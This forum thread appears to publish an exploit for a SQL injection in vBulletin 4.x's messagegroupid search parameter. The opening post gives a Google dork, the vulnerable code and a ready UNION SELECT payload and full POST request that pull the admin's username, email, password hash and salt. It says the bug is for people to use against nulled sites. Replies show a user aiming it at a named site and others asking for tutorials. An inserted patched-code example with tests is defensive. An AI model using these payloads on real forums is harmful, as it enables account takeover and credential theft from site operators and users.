
Thread: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

  1. #1
    Security Researcher fb1h2s
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32

    Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

    # Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
    # Google Dork: intitle: powered by Vbulletin 4
    # Date: 20/07/2011
    # Author: FB1H2S
    # Software Link: [http://www.vbulletin.com/]
    # Version: [4.x.x]
    # Tested on: [relevant os]
    # CVE : [http://members.vbulletin.com/]

    #####################################################
    Vulnerability:
    #####################################################

    Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.

    #####################################################
    Vulnerable Code:
    #####################################################

    File: /vbforum/search/type/socialgroupmessage.php
    Line No: 388
    Parameter : messagegroupid


    Code:
    if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
    {
        $value = $registry->GPC['messagegroupid'];
        if (!is_array($value))
        {
            $value = array($value);
        }

        // only a lone space or an empty string is rejected; nothing forces the
        // elements to be integers before they are concatenated into the query
        if (!(in_array(' ', $value) OR in_array('', $value)))
        {
            if ($rst = $vbulletin->db->query_read("
                SELECT socialgroup.name
                FROM " . TABLE_PREFIX . "socialgroup AS socialgroup
                WHERE socialgroup.groupid IN (" . implode(', ', $value) . ")"))   // ---> line 388: injection point
            {
                // result handling not shown in the original post
            }
        }
    }

    #####################################################
    Exploitation:
    #####################################################
    Post data on: -->search.php?search_type=1
    --> Search Single Content Type

    Keywords : Valid Group Message

    Search Type : Group Messages

    Search in Group : Valid Group Id

    &messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    #####################################################
    Note:
    #####################################################

    Funny part was that a similar bug was found in the same module (search query) two months back. Anyway, Vbulletin has released a patch, as this one was reported to them by altex, hence customers are safe except lousy admins. And this bug is for people to play with the many Nulled VB sites out there. "Say No to Piracy Disclosure".

    #####################################################
    More Details:
    #####################################################

    Exact Request as follows:

    Code:
    query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
    Hacking Is a Matter of Time Knowledge and Patience
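    As an added example (not part of the original post and not vBulletin's own code), the snippet below is a hardened replacement for the messagegroupid handling quoted above. The defect in the quoted code is that only a lone space or an empty string is filtered out before `implode()` builds the `IN (...)` list, so any other string is concatenated straight into the SQL. The fix is to force every element to a plain integer and refuse the whole request otherwise. `$registry`, `$vbulletin` and `TABLE_PREFIX` are assumed to exist as they do in vBulletin; `cleanGroupIds()` and the test values are constructed for this example.

```php
<?php
// Added example, not vBulletin's own code: hardened handling of the
// messagegroupid search parameter. $registry, $vbulletin and TABLE_PREFIX
// are assumed to exist as in vBulletin; everything else is self-contained.

/**
 * Reduce a raw GPC value (string or array of strings) to a list of
 * non-negative integer group ids. Returns an empty array if ANY element
 * is not a plain decimal integer, so the request is refused outright
 * rather than partially trusted.
 */
function cleanGroupIds($raw)
{
    if (!is_array($raw)) {
        $raw = array($raw);
    }
    $ids = array();
    foreach ($raw as $v) {
        if (is_int($v)) {
            $v = (string) $v;   // ctype_digit() must be given a string
        }
        // ctype_digit() is true only for a non-empty string made of 0-9, so
        // "", " ", "-1" and "3 ) UNION SELECT ..." all fail this test.
        if (!is_string($v) || !ctype_digit($v)) {
            return array();
        }
        $ids[] = (int) $v;
    }
    return $ids;
}

// Self-check on constructed inputs (no database involved). The third
// input is the shape of payload the advisory describes; it is rejected.
assert(cleanGroupIds('3') === array(3));
assert(cleanGroupIds(array('3', '12')) === array(3, 12));
assert(cleanGroupIds(array('3 ) UNION SELECT 1#')) === array());
assert(cleanGroupIds(array('')) === array());
assert(cleanGroupIds(array('3', ' ')) === array());

// How the search module would use it: after cleanGroupIds() every element
// is an int, so implode() can only ever yield text such as "3, 12".
if (isset($registry->GPC['messagegroupid'])) {
    $ids = cleanGroupIds($registry->GPC['messagegroupid']);
    if (count($ids) > 0) {
        $rst = $vbulletin->db->query_read("
            SELECT socialgroup.name
            FROM " . TABLE_PREFIX . "socialgroup AS socialgroup
            WHERE socialgroup.groupid IN (" . implode(', ', $ids) . ")");
    }
}
```

    The check is deliberately all-or-nothing: silently dropping the bad element would let a client probe which values are filtered, whereas refusing the request gives a log entry to alert on. Inside vBulletin itself the same cast belongs at the point where the parameter is read by the input cleaner, rather than in the search module; the standalone function here just makes the rule visible.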

  2. #2
    fb1h2s
    Technically this is not a 0-day, but this would be the first public bug release.

  3. #3
    Infosec Enthusiast AnArKI
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2
    lol....where did u test it ???

  4. #4
    fb1h2s
    @anarki well, the majority of the Admins out there are lazy people; they should learn patch management from you.

  5. #5
    hi, tnx for this bug

    I tried to attack but I was unsuccessful. I do not know why; maybe I just did not notice something.

    my target :
    Code:
    http://www.x.net/search.php?search_type=1#ads=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

  6. #6
    offtopic
    fb1h2s, what does " Say No to Piracy Disclosure ". mean?

  7. #7
    fb1h2s
    That's a poetic saying in the author's description: "it says people go out and shell all pirated VB forums". Say no to piracy campaign lol.

  8. #8
    fb1h2s
    @sheller the bug is in the POST method; it's very similar to the previous Vbulletin bug/exploit.
    And I believe you are trying this out with prior permission from whomsoever it may concern.

  9. #9
    Quote Originally Posted by fb1h2s:
    @sheller the bug is in the POST method; it's very similar to the previous Vbulletin bug/exploit.
    And I believe you are trying this out with prior permission from whomsoever it may concern.
    can you make a video tut?

  10. #10
    I tried testing this, and get an error. It seems that this is because a second query is also executed using the messagegroupid parameter before being returned. I did find a working exploit on packetstorm, but I am still trying to understand it 100% and turn it into a working python exploit :>

    http://0x6a616d6573.blogspot.com/201...tion-take.html
